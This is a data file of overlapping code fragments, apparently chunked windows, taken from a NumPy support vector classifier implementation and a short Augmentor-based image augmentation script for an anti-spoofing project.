"\"\"\" estimate decision boundary and its support vectors Parameters ---------- X : (sample_size,",
"= learning_rate t2 = np.sum(np.square(t)) if self.C == np.Inf: a = np.ones(len(t)) else:",
"if np.allclose(self.distance(self.X) * self.t, 1, rtol=0.01, atol=0.01): break else: if np.all(np.greater_equal(1.01, self.distance(self.X) *",
"* self.t[:, None] * self.kernel(self.X, self.X)) @ self.a) def predict(self, x): \"\"\" predict",
"numpy as np class SupportVectorClassifier(object): def __init__(self, kernel, C=np.Inf): \"\"\" construct support vector",
"t2 np.clip(a, 0, self.C, out=a) mask = a > 0 self.X = X[mask]",
"def fit(self, X, t, learning_rate=0.1, decay_step=10000, decay_rate=0.9, min_lr=1e-5): \"\"\" estimate decision boundary and",
"kernel, C=np.Inf): \"\"\" construct support vector classifier Parameters ---------- kernel : Kernel kernel",
"None] * self.kernel(self.X, self.X)) @ self.a) def predict(self, x): \"\"\" predict labels of",
"float minimum value of learning rate Attributes ---------- a : (sample_size,) ndarray lagrange",
"x : (sample_size, n_features) ndarray input Returns ------- label : (sample_size,) ndarray predicted",
"def predict(self, x): \"\"\" predict labels of the input Parameters ---------- x :",
"support_vector : (n_vector, n_features) ndarray support vectors of the boundary \"\"\" if X.ndim",
": (n_vector, n_features) ndarray support vectors of the boundary \"\"\" if X.ndim ==",
"self.t - np.sum( self.a * self.t * self.kernel(self.X, self.X), axis=-1)) if self.C ==",
"* Gram while True: for i in range(decay_step): grad = 1 - H",
"ndarray distance from the boundary \"\"\" distance = np.sum( self.a * self.t *",
"of the boundary \"\"\" if X.ndim == 1: X = X[:, None] assert",
"np.sign(y) return label def distance(self, x): \"\"\" calculate distance from the decision boundary",
"C def fit(self, X, t, learning_rate=0.1, decay_step=10000, decay_rate=0.9, min_lr=1e-5): \"\"\" estimate decision boundary",
"------- distance : (sample_size,) ndarray distance from the boundary \"\"\" distance = np.sum(",
"predict labels of the input Parameters ---------- x : (sample_size, n_features) ndarray input",
"+ self.C / 10 Gram = self.kernel(X, X) H = t * t[:,",
"@ self.a) def predict(self, x): \"\"\" predict labels of the input Parameters ----------",
"np.Inf: if np.allclose(self.distance(self.X) * self.t, 1, rtol=0.01, atol=0.01): break else: if np.all(np.greater_equal(1.01, self.distance(self.X)",
"( np.sum(self.a) - self.a @ (self.t * self.t[:, None] * self.kernel(self.X, self.X)) @",
"labels \"\"\" y = self.distance(x) label = np.sign(y) return label def distance(self, x):",
"x): \"\"\" calculate distance from the decision boundary Parameters ---------- x : (sample_size,",
"self.C == np.Inf: a = np.ones(len(t)) else: a = np.zeros(len(t)) + self.C /",
": float penalty of misclassification \"\"\" self.kernel = kernel self.C = C def",
"__init__(self, kernel, C=np.Inf): \"\"\" construct support vector classifier Parameters ---------- kernel : Kernel",
"------- label : (sample_size,) ndarray predicted labels \"\"\" y = self.distance(x) label =",
"(sample_size, n_features) ndarray input data t : (sample_size,) ndarray corresponding labels 1 or",
"1 - H @ a a += lr * grad a -= (a",
"calculate distance from the decision boundary Parameters ---------- x : (sample_size, n_features) ndarray",
"= np.sum( self.a * self.t * self.kernel(x, self.X), axis=-1) + self.b return distance",
"distance : (sample_size,) ndarray distance from the boundary \"\"\" distance = np.sum( self.a",
"---------- kernel : Kernel kernel function to compute inner products C : float",
"1: X = X[:, None] assert X.ndim == 2 assert t.ndim == 1",
"distance(self, x): \"\"\" calculate distance from the decision boundary Parameters ---------- x :",
"1 lr = learning_rate t2 = np.sum(np.square(t)) if self.C == np.Inf: a =",
"a += lr * grad a -= (a @ t) * t /",
"self.X), axis=-1)) if self.C == np.Inf: if np.allclose(self.distance(self.X) * self.t, 1, rtol=0.01, atol=0.01):",
"self.t[:, None] * self.kernel(self.X, self.X)) @ self.a) def predict(self, x): \"\"\" predict labels",
"> 0 self.X = X[mask] self.t = t[mask] self.a = a[mask] self.b =",
"True: for i in range(decay_step): grad = 1 - H @ a a",
"(self.t * self.t[:, None] * self.kernel(self.X, self.X)) @ self.a) def predict(self, x): \"\"\"",
"np.allclose(self.distance(self.X) * self.t, 1, rtol=0.01, atol=0.01): break else: if np.all(np.greater_equal(1.01, self.distance(self.X) * self.t)):",
"(n_vector, n_features) ndarray support vectors of the boundary \"\"\" if X.ndim == 1:",
"= t * t[:, None] * Gram while True: for i in range(decay_step):",
"---------- a : (sample_size,) ndarray lagrange multiplier b : float bias parameter support_vector",
"axis=-1)) if self.C == np.Inf: if np.allclose(self.distance(self.X) * self.t, 1, rtol=0.01, atol=0.01): break",
"distance from the decision boundary Parameters ---------- x : (sample_size, n_features) ndarray input",
"value of learning rate Attributes ---------- a : (sample_size,) ndarray lagrange multiplier b",
"of learning rate Attributes ---------- a : (sample_size,) ndarray lagrange multiplier b :",
"= t[mask] self.a = a[mask] self.b = np.mean( self.t - np.sum( self.a *",
"from the boundary \"\"\" distance = np.sum( self.a * self.t * self.kernel(x, self.X),",
"learning_rate : float update ratio of the lagrange multiplier decay_step : int number",
"assert X.ndim == 2 assert t.ndim == 1 lr = learning_rate t2 =",
"- H @ a a += lr * grad a -= (a @",
"X) H = t * t[:, None] * Gram while True: for i",
": (sample_size,) ndarray distance from the boundary \"\"\" distance = np.sum( self.a *",
"ndarray predicted labels \"\"\" y = self.distance(x) label = np.sign(y) return label def",
"@ (self.t * self.t[:, None] * self.kernel(self.X, self.X)) @ self.a) def predict(self, x):",
"decay_step : int number of iterations till decay decay_rate : float rate of",
"\"\"\" predict labels of the input Parameters ---------- x : (sample_size, n_features) ndarray",
"of the lagrange multiplier decay_step : int number of iterations till decay decay_rate",
"self.distance(self.X) * self.t)): break if lr < min_lr: break lr *= decay_rate def",
"of iterations till decay decay_rate : float rate of learning rate decay min_lr",
"labels 1 or -1 learning_rate : float update ratio of the lagrange multiplier",
"self.t * self.kernel(self.X, self.X), axis=-1)) if self.C == np.Inf: if np.allclose(self.distance(self.X) * self.t,",
"np.Inf: a = np.ones(len(t)) else: a = np.zeros(len(t)) + self.C / 10 Gram",
"of the input Parameters ---------- x : (sample_size, n_features) ndarray input Returns -------",
"decision boundary Parameters ---------- x : (sample_size, n_features) ndarray input Returns ------- distance",
"- self.a @ (self.t * self.t[:, None] * self.kernel(self.X, self.X)) @ self.a) def",
"(sample_size,) ndarray distance from the boundary \"\"\" distance = np.sum( self.a * self.t",
"n_features) ndarray input Returns ------- distance : (sample_size,) ndarray distance from the boundary",
"compute inner products C : float penalty of misclassification \"\"\" self.kernel = kernel",
"(a @ t) * t / t2 np.clip(a, 0, self.C, out=a) mask =",
"None] assert X.ndim == 2 assert t.ndim == 1 lr = learning_rate t2",
"lagrange multiplier b : float bias parameter support_vector : (n_vector, n_features) ndarray support",
"lagrange multiplier decay_step : int number of iterations till decay decay_rate : float",
"decay_rate : float rate of learning rate decay min_lr : float minimum value",
"input data t : (sample_size,) ndarray corresponding labels 1 or -1 learning_rate :",
"Returns ------- label : (sample_size,) ndarray predicted labels \"\"\" y = self.distance(x) label",
"learning_rate t2 = np.sum(np.square(t)) if self.C == np.Inf: a = np.ones(len(t)) else: a",
"/ t2 np.clip(a, 0, self.C, out=a) mask = a > 0 self.X =",
"t / t2 np.clip(a, 0, self.C, out=a) mask = a > 0 self.X",
"= np.ones(len(t)) else: a = np.zeros(len(t)) + self.C / 10 Gram = self.kernel(X,",
"label = np.sign(y) return label def distance(self, x): \"\"\" calculate distance from the",
"and its support vectors Parameters ---------- X : (sample_size, n_features) ndarray input data",
"np.clip(a, 0, self.C, out=a) mask = a > 0 self.X = X[mask] self.t",
"from the decision boundary Parameters ---------- x : (sample_size, n_features) ndarray input Returns",
"(sample_size,) ndarray corresponding labels 1 or -1 learning_rate : float update ratio of",
"= 1 - H @ a a += lr * grad a -=",
"min_lr=1e-5): \"\"\" estimate decision boundary and its support vectors Parameters ---------- X :",
"Returns ------- distance : (sample_size,) ndarray distance from the boundary \"\"\" distance =",
"Parameters ---------- X : (sample_size, n_features) ndarray input data t : (sample_size,) ndarray",
"ndarray input data t : (sample_size,) ndarray corresponding labels 1 or -1 learning_rate",
"np.sum( self.a * self.t * self.kernel(self.X, self.X), axis=-1)) if self.C == np.Inf: if",
"support vector classifier Parameters ---------- kernel : Kernel kernel function to compute inner",
"if self.C == np.Inf: a = np.ones(len(t)) else: a = np.zeros(len(t)) + self.C",
"to compute inner products C : float penalty of misclassification \"\"\" self.kernel =",
"Attributes ---------- a : (sample_size,) ndarray lagrange multiplier b : float bias parameter",
"n_features) ndarray support vectors of the boundary \"\"\" if X.ndim == 1: X",
"rate Attributes ---------- a : (sample_size,) ndarray lagrange multiplier b : float bias",
"decay_step=10000, decay_rate=0.9, min_lr=1e-5): \"\"\" estimate decision boundary and its support vectors Parameters ----------",
"== np.Inf: a = np.ones(len(t)) else: a = np.zeros(len(t)) + self.C / 10",
"1 or -1 learning_rate : float update ratio of the lagrange multiplier decay_step",
"grad = 1 - H @ a a += lr * grad a",
"ndarray support vectors of the boundary \"\"\" if X.ndim == 1: X =",
"vector classifier Parameters ---------- kernel : Kernel kernel function to compute inner products",
": (sample_size, n_features) ndarray input Returns ------- distance : (sample_size,) ndarray distance from",
": float minimum value of learning rate Attributes ---------- a : (sample_size,) ndarray",
"ndarray lagrange multiplier b : float bias parameter support_vector : (n_vector, n_features) ndarray",
": (sample_size, n_features) ndarray input data t : (sample_size,) ndarray corresponding labels 1",
"break if lr < min_lr: break lr *= decay_rate def lagrangian_function(self): return (",
"< min_lr: break lr *= decay_rate def lagrangian_function(self): return ( np.sum(self.a) - self.a",
"assert t.ndim == 1 lr = learning_rate t2 = np.sum(np.square(t)) if self.C ==",
"H @ a a += lr * grad a -= (a @ t)",
"corresponding labels 1 or -1 learning_rate : float update ratio of the lagrange",
"parameter support_vector : (n_vector, n_features) ndarray support vectors of the boundary \"\"\" if",
"multiplier b : float bias parameter support_vector : (n_vector, n_features) ndarray support vectors",
"== 2 assert t.ndim == 1 lr = learning_rate t2 = np.sum(np.square(t)) if",
"self.kernel(self.X, self.X), axis=-1)) if self.C == np.Inf: if np.allclose(self.distance(self.X) * self.t, 1, rtol=0.01,",
"/ 10 Gram = self.kernel(X, X) H = t * t[:, None] *",
"Kernel kernel function to compute inner products C : float penalty of misclassification",
"lr = learning_rate t2 = np.sum(np.square(t)) if self.C == np.Inf: a = np.ones(len(t))",
"self.X = X[mask] self.t = t[mask] self.a = a[mask] self.b = np.mean( self.t",
"(sample_size,) ndarray lagrange multiplier b : float bias parameter support_vector : (n_vector, n_features)",
"t[mask] self.a = a[mask] self.b = np.mean( self.t - np.sum( self.a * self.t",
"== np.Inf: if np.allclose(self.distance(self.X) * self.t, 1, rtol=0.01, atol=0.01): break else: if np.all(np.greater_equal(1.01,",
"t * t[:, None] * Gram while True: for i in range(decay_step): grad",
"till decay decay_rate : float rate of learning rate decay min_lr : float",
"self.t, 1, rtol=0.01, atol=0.01): break else: if np.all(np.greater_equal(1.01, self.distance(self.X) * self.t)): break if",
"a = np.zeros(len(t)) + self.C / 10 Gram = self.kernel(X, X) H =",
"return ( np.sum(self.a) - self.a @ (self.t * self.t[:, None] * self.kernel(self.X, self.X))",
"distance from the boundary \"\"\" distance = np.sum( self.a * self.t * self.kernel(x,",
"x): \"\"\" predict labels of the input Parameters ---------- x : (sample_size, n_features)",
"np.sum(self.a) - self.a @ (self.t * self.t[:, None] * self.kernel(self.X, self.X)) @ self.a)",
"fit(self, X, t, learning_rate=0.1, decay_step=10000, decay_rate=0.9, min_lr=1e-5): \"\"\" estimate decision boundary and its",
"+= lr * grad a -= (a @ t) * t / t2",
"@ a a += lr * grad a -= (a @ t) *",
"X : (sample_size, n_features) ndarray input data t : (sample_size,) ndarray corresponding labels",
"break lr *= decay_rate def lagrangian_function(self): return ( np.sum(self.a) - self.a @ (self.t",
"the boundary \"\"\" distance = np.sum( self.a * self.t * self.kernel(x, self.X), axis=-1)",
"self.C == np.Inf: if np.allclose(self.distance(self.X) * self.t, 1, rtol=0.01, atol=0.01): break else: if",
"bias parameter support_vector : (n_vector, n_features) ndarray support vectors of the boundary \"\"\"",
"* self.t, 1, rtol=0.01, atol=0.01): break else: if np.all(np.greater_equal(1.01, self.distance(self.X) * self.t)): break",
"mask = a > 0 self.X = X[mask] self.t = t[mask] self.a =",
"distance = np.sum( self.a * self.t * self.kernel(x, self.X), axis=-1) + self.b return",
"np.sum(np.square(t)) if self.C == np.Inf: a = np.ones(len(t)) else: a = np.zeros(len(t)) +",
"X[mask] self.t = t[mask] self.a = a[mask] self.b = np.mean( self.t - np.sum(",
"t.ndim == 1 lr = learning_rate t2 = np.sum(np.square(t)) if self.C == np.Inf:",
"self.C / 10 Gram = self.kernel(X, X) H = t * t[:, None]",
"C=np.Inf): \"\"\" construct support vector classifier Parameters ---------- kernel : Kernel kernel function",
"-1 learning_rate : float update ratio of the lagrange multiplier decay_step : int",
"classifier Parameters ---------- kernel : Kernel kernel function to compute inner products C",
"decay_rate def lagrangian_function(self): return ( np.sum(self.a) - self.a @ (self.t * self.t[:, None]",
"boundary Parameters ---------- x : (sample_size, n_features) ndarray input Returns ------- distance :",
"None] * Gram while True: for i in range(decay_step): grad = 1 -",
"X, t, learning_rate=0.1, decay_step=10000, decay_rate=0.9, min_lr=1e-5): \"\"\" estimate decision boundary and its support",
"t) * t / t2 np.clip(a, 0, self.C, out=a) mask = a >",
"data t : (sample_size,) ndarray corresponding labels 1 or -1 learning_rate : float",
": float bias parameter support_vector : (n_vector, n_features) ndarray support vectors of the",
"int number of iterations till decay decay_rate : float rate of learning rate",
"* t[:, None] * Gram while True: for i in range(decay_step): grad =",
"self.a = a[mask] self.b = np.mean( self.t - np.sum( self.a * self.t *",
"the decision boundary Parameters ---------- x : (sample_size, n_features) ndarray input Returns -------",
"self.t = t[mask] self.a = a[mask] self.b = np.mean( self.t - np.sum( self.a",
": int number of iterations till decay decay_rate : float rate of learning",
"X = X[:, None] assert X.ndim == 2 assert t.ndim == 1 lr",
"X[:, None] assert X.ndim == 2 assert t.ndim == 1 lr = learning_rate",
"else: if np.all(np.greater_equal(1.01, self.distance(self.X) * self.t)): break if lr < min_lr: break lr",
"Parameters ---------- kernel : Kernel kernel function to compute inner products C :",
"y = self.distance(x) label = np.sign(y) return label def distance(self, x): \"\"\" calculate",
"in range(decay_step): grad = 1 - H @ a a += lr *",
"n_features) ndarray input data t : (sample_size,) ndarray corresponding labels 1 or -1",
"= np.zeros(len(t)) + self.C / 10 Gram = self.kernel(X, X) H = t",
"break else: if np.all(np.greater_equal(1.01, self.distance(self.X) * self.t)): break if lr < min_lr: break",
": (sample_size,) ndarray predicted labels \"\"\" y = self.distance(x) label = np.sign(y) return",
": Kernel kernel function to compute inner products C : float penalty of",
"X.ndim == 1: X = X[:, None] assert X.ndim == 2 assert t.ndim",
"boundary \"\"\" if X.ndim == 1: X = X[:, None] assert X.ndim ==",
"or -1 learning_rate : float update ratio of the lagrange multiplier decay_step :",
"while True: for i in range(decay_step): grad = 1 - H @ a",
"self.kernel(X, X) H = t * t[:, None] * Gram while True: for",
"learning_rate=0.1, decay_step=10000, decay_rate=0.9, min_lr=1e-5): \"\"\" estimate decision boundary and its support vectors Parameters",
"lagrangian_function(self): return ( np.sum(self.a) - self.a @ (self.t * self.t[:, None] * self.kernel(self.X,",
"== 1 lr = learning_rate t2 = np.sum(np.square(t)) if self.C == np.Inf: a",
": (sample_size, n_features) ndarray input Returns ------- label : (sample_size,) ndarray predicted labels",
"float rate of learning rate decay min_lr : float minimum value of learning",
"number of iterations till decay decay_rate : float rate of learning rate decay",
"0 self.X = X[mask] self.t = t[mask] self.a = a[mask] self.b = np.mean(",
"\"\"\" self.kernel = kernel self.C = C def fit(self, X, t, learning_rate=0.1, decay_step=10000,",
"a[mask] self.b = np.mean( self.t - np.sum( self.a * self.t * self.kernel(self.X, self.X),",
"import numpy as np class SupportVectorClassifier(object): def __init__(self, kernel, C=np.Inf): \"\"\" construct support",
"* self.kernel(self.X, self.X), axis=-1)) if self.C == np.Inf: if np.allclose(self.distance(self.X) * self.t, 1,",
"input Parameters ---------- x : (sample_size, n_features) ndarray input Returns ------- label :",
"self.kernel = kernel self.C = C def fit(self, X, t, learning_rate=0.1, decay_step=10000, decay_rate=0.9,",
"lr < min_lr: break lr *= decay_rate def lagrangian_function(self): return ( np.sum(self.a) -",
"t, learning_rate=0.1, decay_step=10000, decay_rate=0.9, min_lr=1e-5): \"\"\" estimate decision boundary and its support vectors",
"self.a @ (self.t * self.t[:, None] * self.kernel(self.X, self.X)) @ self.a) def predict(self,",
"lr * grad a -= (a @ t) * t / t2 np.clip(a,",
"Parameters ---------- x : (sample_size, n_features) ndarray input Returns ------- label : (sample_size,)",
"\"\"\" calculate distance from the decision boundary Parameters ---------- x : (sample_size, n_features)",
"---------- X : (sample_size, n_features) ndarray input data t : (sample_size,) ndarray corresponding",
"support vectors of the boundary \"\"\" if X.ndim == 1: X = X[:,",
"self.a) def predict(self, x): \"\"\" predict labels of the input Parameters ---------- x",
"float update ratio of the lagrange multiplier decay_step : int number of iterations",
"\"\"\" construct support vector classifier Parameters ---------- kernel : Kernel kernel function to",
"(sample_size,) ndarray predicted labels \"\"\" y = self.distance(x) label = np.sign(y) return label",
"float bias parameter support_vector : (n_vector, n_features) ndarray support vectors of the boundary",
"np.mean( self.t - np.sum( self.a * self.t * self.kernel(self.X, self.X), axis=-1)) if self.C",
"= kernel self.C = C def fit(self, X, t, learning_rate=0.1, decay_step=10000, decay_rate=0.9, min_lr=1e-5):",
"if lr < min_lr: break lr *= decay_rate def lagrangian_function(self): return ( np.sum(self.a)",
"products C : float penalty of misclassification \"\"\" self.kernel = kernel self.C =",
"C : float penalty of misclassification \"\"\" self.kernel = kernel self.C = C",
"rtol=0.01, atol=0.01): break else: if np.all(np.greater_equal(1.01, self.distance(self.X) * self.t)): break if lr <",
"kernel self.C = C def fit(self, X, t, learning_rate=0.1, decay_step=10000, decay_rate=0.9, min_lr=1e-5): \"\"\"",
"2 assert t.ndim == 1 lr = learning_rate t2 = np.sum(np.square(t)) if self.C",
"boundary and its support vectors Parameters ---------- X : (sample_size, n_features) ndarray input",
"if self.C == np.Inf: if np.allclose(self.distance(self.X) * self.t, 1, rtol=0.01, atol=0.01): break else:",
"* t / t2 np.clip(a, 0, self.C, out=a) mask = a > 0",
"Gram while True: for i in range(decay_step): grad = 1 - H @",
"- np.sum( self.a * self.t * self.kernel(self.X, self.X), axis=-1)) if self.C == np.Inf:",
"Parameters ---------- x : (sample_size, n_features) ndarray input Returns ------- distance : (sample_size,)",
"* self.t)): break if lr < min_lr: break lr *= decay_rate def lagrangian_function(self):",
"-= (a @ t) * t / t2 np.clip(a, 0, self.C, out=a) mask",
"self.b = np.mean( self.t - np.sum( self.a * self.t * self.kernel(self.X, self.X), axis=-1))",
"= a > 0 self.X = X[mask] self.t = t[mask] self.a = a[mask]",
"the input Parameters ---------- x : (sample_size, n_features) ndarray input Returns ------- label",
"float penalty of misclassification \"\"\" self.kernel = kernel self.C = C def fit(self,",
"atol=0.01): break else: if np.all(np.greater_equal(1.01, self.distance(self.X) * self.t)): break if lr < min_lr:",
"\"\"\" y = self.distance(x) label = np.sign(y) return label def distance(self, x): \"\"\"",
"as np class SupportVectorClassifier(object): def __init__(self, kernel, C=np.Inf): \"\"\" construct support vector classifier",
"misclassification \"\"\" self.kernel = kernel self.C = C def fit(self, X, t, learning_rate=0.1,",
"H = t * t[:, None] * Gram while True: for i in",
"Gram = self.kernel(X, X) H = t * t[:, None] * Gram while",
"*= decay_rate def lagrangian_function(self): return ( np.sum(self.a) - self.a @ (self.t * self.t[:,",
"self.t)): break if lr < min_lr: break lr *= decay_rate def lagrangian_function(self): return",
"a -= (a @ t) * t / t2 np.clip(a, 0, self.C, out=a)",
"self.kernel(self.X, self.X)) @ self.a) def predict(self, x): \"\"\" predict labels of the input",
"= C def fit(self, X, t, learning_rate=0.1, decay_step=10000, decay_rate=0.9, min_lr=1e-5): \"\"\" estimate decision",
"estimate decision boundary and its support vectors Parameters ---------- X : (sample_size, n_features)",
"i in range(decay_step): grad = 1 - H @ a a += lr",
"= X[:, None] assert X.ndim == 2 assert t.ndim == 1 lr =",
"rate decay min_lr : float minimum value of learning rate Attributes ---------- a",
"predict(self, x): \"\"\" predict labels of the input Parameters ---------- x : (sample_size,",
"t : (sample_size,) ndarray corresponding labels 1 or -1 learning_rate : float update",
"decay decay_rate : float rate of learning rate decay min_lr : float minimum",
"a > 0 self.X = X[mask] self.t = t[mask] self.a = a[mask] self.b",
"= np.sum(np.square(t)) if self.C == np.Inf: a = np.ones(len(t)) else: a = np.zeros(len(t))",
"= np.mean( self.t - np.sum( self.a * self.t * self.kernel(self.X, self.X), axis=-1)) if",
"out=a) mask = a > 0 self.X = X[mask] self.t = t[mask] self.a",
"self.C = C def fit(self, X, t, learning_rate=0.1, decay_step=10000, decay_rate=0.9, min_lr=1e-5): \"\"\" estimate",
"multiplier decay_step : int number of iterations till decay decay_rate : float rate",
"* self.t * self.kernel(self.X, self.X), axis=-1)) if self.C == np.Inf: if np.allclose(self.distance(self.X) *",
"* self.kernel(self.X, self.X)) @ self.a) def predict(self, x): \"\"\" predict labels of the",
"a = np.ones(len(t)) else: a = np.zeros(len(t)) + self.C / 10 Gram =",
"1, rtol=0.01, atol=0.01): break else: if np.all(np.greater_equal(1.01, self.distance(self.X) * self.t)): break if lr",
"\"\"\" if X.ndim == 1: X = X[:, None] assert X.ndim == 2",
"vectors of the boundary \"\"\" if X.ndim == 1: X = X[:, None]",
"a a += lr * grad a -= (a @ t) * t",
"label def distance(self, x): \"\"\" calculate distance from the decision boundary Parameters ----------",
"10 Gram = self.kernel(X, X) H = t * t[:, None] * Gram",
"def lagrangian_function(self): return ( np.sum(self.a) - self.a @ (self.t * self.t[:, None] *",
"== 1: X = X[:, None] assert X.ndim == 2 assert t.ndim ==",
"if np.all(np.greater_equal(1.01, self.distance(self.X) * self.t)): break if lr < min_lr: break lr *=",
"= self.kernel(X, X) H = t * t[:, None] * Gram while True:",
"def __init__(self, kernel, C=np.Inf): \"\"\" construct support vector classifier Parameters ---------- kernel :",
"---------- x : (sample_size, n_features) ndarray input Returns ------- distance : (sample_size,) ndarray",
"min_lr: break lr *= decay_rate def lagrangian_function(self): return ( np.sum(self.a) - self.a @",
"grad a -= (a @ t) * t / t2 np.clip(a, 0, self.C,",
"kernel : Kernel kernel function to compute inner products C : float penalty",
"rate of learning rate decay min_lr : float minimum value of learning rate",
"label : (sample_size,) ndarray predicted labels \"\"\" y = self.distance(x) label = np.sign(y)",
"a : (sample_size,) ndarray lagrange multiplier b : float bias parameter support_vector :",
"function to compute inner products C : float penalty of misclassification \"\"\" self.kernel",
"kernel function to compute inner products C : float penalty of misclassification \"\"\"",
"learning rate Attributes ---------- a : (sample_size,) ndarray lagrange multiplier b : float",
"predicted labels \"\"\" y = self.distance(x) label = np.sign(y) return label def distance(self,",
"SupportVectorClassifier(object): def __init__(self, kernel, C=np.Inf): \"\"\" construct support vector classifier Parameters ---------- kernel",
"else: a = np.zeros(len(t)) + self.C / 10 Gram = self.kernel(X, X) H",
"construct support vector classifier Parameters ---------- kernel : Kernel kernel function to compute",
"of learning rate decay min_lr : float minimum value of learning rate Attributes",
"= self.distance(x) label = np.sign(y) return label def distance(self, x): \"\"\" calculate distance",
"inner products C : float penalty of misclassification \"\"\" self.kernel = kernel self.C",
"of misclassification \"\"\" self.kernel = kernel self.C = C def fit(self, X, t,",
"return label def distance(self, x): \"\"\" calculate distance from the decision boundary Parameters",
"= X[mask] self.t = t[mask] self.a = a[mask] self.b = np.mean( self.t -",
": (sample_size,) ndarray lagrange multiplier b : float bias parameter support_vector : (n_vector,",
": float rate of learning rate decay min_lr : float minimum value of",
"\"\"\" distance = np.sum( self.a * self.t * self.kernel(x, self.X), axis=-1) + self.b",
"iterations till decay decay_rate : float rate of learning rate decay min_lr :",
"lr *= decay_rate def lagrangian_function(self): return ( np.sum(self.a) - self.a @ (self.t *",
"update ratio of the lagrange multiplier decay_step : int number of iterations till",
"ratio of the lagrange multiplier decay_step : int number of iterations till decay",
"learning rate decay min_lr : float minimum value of learning rate Attributes ----------",
"min_lr : float minimum value of learning rate Attributes ---------- a : (sample_size,)"
] |
[
"if IP: p.random_color(0.5, min_factor=0.4, max_factor=1.6) p.random_brightness(0.5, min_factor=0.4, max_factor=1.6) p.random_contrast(0.5, min_factor=0.4, max_factor=1.2) if Graph:",
"= Augmentor.Pipeline(folder) if IP: p.random_color(0.5, min_factor=0.4, max_factor=1.6) p.random_brightness(0.5, min_factor=0.4, max_factor=1.6) p.random_contrast(0.5, min_factor=0.4, max_factor=1.2)",
"<filename>anti-spoof/augmentor.py<gh_stars>1-10 import Augmentor def RandomAugment(folder, IP=False, Graph=False, Erase=False): if IP==False and Graph==False and",
"Graph: #p.rotate(probability=0.7, max_left_rotation=20, max_right_rotation=20) #p.zoom(probability=0.5, min_factor=0.8, max_factor=1.2) p.random_distortion(probability=0.5, grid_width=4, grid_height=4, magnitude=4) #p.skew_left_right(probability=0.5, magnitude=0.15)",
"RandomAugment(folder, IP=False, Graph=False, Erase=False): if IP==False and Graph==False and Erase==False: return None p",
"p.random_erasing(1.0,rectangle_area=0.5) return p if __name__=='__main__': folder = '29xxx' p = RandomAugment(folder, Graph=True) p.sample(1000)",
"if Graph: #p.rotate(probability=0.7, max_left_rotation=20, max_right_rotation=20) #p.zoom(probability=0.5, min_factor=0.8, max_factor=1.2) p.random_distortion(probability=0.5, grid_width=4, grid_height=4, magnitude=4) #p.skew_left_right(probability=0.5,",
"p.random_distortion(probability=0.5, grid_width=4, grid_height=4, magnitude=4) #p.skew_left_right(probability=0.5, magnitude=0.15) if Erase: p.random_erasing(1.0,rectangle_area=0.5) return p if __name__=='__main__':",
"p.random_brightness(0.5, min_factor=0.4, max_factor=1.6) p.random_contrast(0.5, min_factor=0.4, max_factor=1.2) if Graph: #p.rotate(probability=0.7, max_left_rotation=20, max_right_rotation=20) #p.zoom(probability=0.5, min_factor=0.8,",
"Erase: p.random_erasing(1.0,rectangle_area=0.5) return p if __name__=='__main__': folder = '29xxx' p = RandomAugment(folder, Graph=True)",
"and Erase==False: return None p = Augmentor.Pipeline(folder) if IP: p.random_color(0.5, min_factor=0.4, max_factor=1.6) p.random_brightness(0.5,",
"if Erase: p.random_erasing(1.0,rectangle_area=0.5) return p if __name__=='__main__': folder = '29xxx' p = RandomAugment(folder,",
"IP=False, Graph=False, Erase=False): if IP==False and Graph==False and Erase==False: return None p =",
"#p.zoom(probability=0.5, min_factor=0.8, max_factor=1.2) p.random_distortion(probability=0.5, grid_width=4, grid_height=4, magnitude=4) #p.skew_left_right(probability=0.5, magnitude=0.15) if Erase: p.random_erasing(1.0,rectangle_area=0.5) return",
"max_factor=1.2) p.random_distortion(probability=0.5, grid_width=4, grid_height=4, magnitude=4) #p.skew_left_right(probability=0.5, magnitude=0.15) if Erase: p.random_erasing(1.0,rectangle_area=0.5) return p if",
"IP: p.random_color(0.5, min_factor=0.4, max_factor=1.6) p.random_brightness(0.5, min_factor=0.4, max_factor=1.6) p.random_contrast(0.5, min_factor=0.4, max_factor=1.2) if Graph: #p.rotate(probability=0.7,",
"max_factor=1.6) p.random_brightness(0.5, min_factor=0.4, max_factor=1.6) p.random_contrast(0.5, min_factor=0.4, max_factor=1.2) if Graph: #p.rotate(probability=0.7, max_left_rotation=20, max_right_rotation=20) #p.zoom(probability=0.5,",
"#p.skew_left_right(probability=0.5, magnitude=0.15) if Erase: p.random_erasing(1.0,rectangle_area=0.5) return p if __name__=='__main__': folder = '29xxx' p",
"Erase=False): if IP==False and Graph==False and Erase==False: return None p = Augmentor.Pipeline(folder) if",
"IP==False and Graph==False and Erase==False: return None p = Augmentor.Pipeline(folder) if IP: p.random_color(0.5,",
"#p.rotate(probability=0.7, max_left_rotation=20, max_right_rotation=20) #p.zoom(probability=0.5, min_factor=0.8, max_factor=1.2) p.random_distortion(probability=0.5, grid_width=4, grid_height=4, magnitude=4) #p.skew_left_right(probability=0.5, magnitude=0.15) if",
"p.random_color(0.5, min_factor=0.4, max_factor=1.6) p.random_brightness(0.5, min_factor=0.4, max_factor=1.6) p.random_contrast(0.5, min_factor=0.4, max_factor=1.2) if Graph: #p.rotate(probability=0.7, max_left_rotation=20,",
"max_factor=1.2) if Graph: #p.rotate(probability=0.7, max_left_rotation=20, max_right_rotation=20) #p.zoom(probability=0.5, min_factor=0.8, max_factor=1.2) p.random_distortion(probability=0.5, grid_width=4, grid_height=4, magnitude=4)",
"max_left_rotation=20, max_right_rotation=20) #p.zoom(probability=0.5, min_factor=0.8, max_factor=1.2) p.random_distortion(probability=0.5, grid_width=4, grid_height=4, magnitude=4) #p.skew_left_right(probability=0.5, magnitude=0.15) if Erase:",
"None p = Augmentor.Pipeline(folder) if IP: p.random_color(0.5, min_factor=0.4, max_factor=1.6) p.random_brightness(0.5, min_factor=0.4, max_factor=1.6) p.random_contrast(0.5,",
"import Augmentor def RandomAugment(folder, IP=False, Graph=False, Erase=False): if IP==False and Graph==False and Erase==False:",
"Graph==False and Erase==False: return None p = Augmentor.Pipeline(folder) if IP: p.random_color(0.5, min_factor=0.4, max_factor=1.6)",
"min_factor=0.4, max_factor=1.6) p.random_brightness(0.5, min_factor=0.4, max_factor=1.6) p.random_contrast(0.5, min_factor=0.4, max_factor=1.2) if Graph: #p.rotate(probability=0.7, max_left_rotation=20, max_right_rotation=20)",
"Augmentor def RandomAugment(folder, IP=False, Graph=False, Erase=False): if IP==False and Graph==False and Erase==False: return",
